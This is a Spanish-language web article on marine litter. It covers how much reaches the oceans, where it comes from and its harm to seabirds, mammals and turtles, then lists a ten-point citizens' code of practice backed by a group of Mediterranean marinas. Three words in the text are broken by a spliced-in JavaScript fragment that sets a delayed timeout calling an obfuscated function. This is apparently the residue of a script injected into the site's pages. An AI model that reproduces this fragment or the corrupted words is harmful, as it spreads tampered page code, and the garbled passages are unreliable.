Las basuras marinas son los residuos sólidos generados por la propia acción del hombre que, por diferentes causas, acaban abandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andonados en ambientes marinos o costeros.
Las basuras marinas se consideran ya un problema global tan grave como el cambio climático, la pérdida de diversidad o la acidificación de los océanos. Son una seria amenaza para la vida marina, tanto por su elevada cantidad en el medio marino como por su composición (principalmente plásticos con unos elevados tiempos de permanencia, a veces superiores a 200 años).
Y es que cada año llegan a los mares y océanos cerca de 10 millones de toneladas de basura, generandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando un gran problema medioambiental. El 80% de estos residuos tienen su origen en la tierra: los que tiramos, los que arrojamos al inodoro… que al final acaban por llegar al mar. Y el 20% de estas basuras marinas proviene de actividades que se realizan en el mar.
Las consecuencias de esto no es solo un problema estético que afecta al paisaje sino que produce un importante impacto en los individuos y, sobre todo, en los ecosistemas marinos. Más de un millón de aves marinas y 100.000 mamíferos y tortugas mueren cada año por enredo o ingesta de estos residuos que son principalmente plásticos.
Ante esta grave situación nace el «Decálogo ciudadano contra las basuras marinas», un documento consensuado entre organizaciones y entidades ambientales, administraciones, empresas del sector, pescadores o entidades del tercer sector. Dicho documento hace hincapié en la importancia de la concienciación para afrontar el problema de las basuras marinas. Para ello recoge consejos y buenas prácticas centradas en la prevención y en la adopción de hábitos de consumo responsable y en la implicación y responsabilidad de la ciudadanía.
¿Cuáles son los puntos de este Decálogo?
- Piensa globalmente, actúa localmente. Demos ejemplo con nuestra propia responsabilidad.
- Deposita los productos higiénicos (toallitas, bastoncillos, compresas, etc.) en la papelera, nunca en el inodoro.
- Si te gusta pescar, sé cuidadoso con los aparejos. Los cabos, anzuelos o sedales pueden ser mortales para los animales marinos si caen al mar.
- Consume de manera responsable.
- Aplica la regla de las 3R (reducir, reutilizar, reciclar) en tus hábitos de consumo para minimizar la generación de residuos marinos.
- Disfruta de la naturaleza con responsabilidad. Guarda los residuos que generes y tíralos posteriormente en el lugar habilitado para ello.
- Únete a la ciencia ciudadana. Cuanto más conozcas sobre algo más fácil es actuar para prevenir. Para saber más sobre basuras marinas puedes visitar esta página web: www.aebam. org (Asociación Española de Basuras Marinas).
- Puedes recoger algún residuo que encuentres si lo ves en el mar o en la playa o unirte a las campañas de limpieza de playas que se realicen cerca de ti.
- Educa a los niños y jóvenes en el respeto a la naturaleza y da ejemplo en las personas de tu entorno.
- Cuandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando navegues, no tires residuos al agua. Guárdalos y al llegar a puerto los depositas donde corresponda.
Tú formas parte de la naturaleza, en tierra deja tu huella y en el mar, tu estela.
El Grupo Marinas del Mediterráneo ha apoyado desde el principio esta iniciativa y está adherido a este Decálogo. Tanto desde el Grupo como desde los tres puertos deportivos se organizan con frecuencia actividades de concienciación y educación ambiental.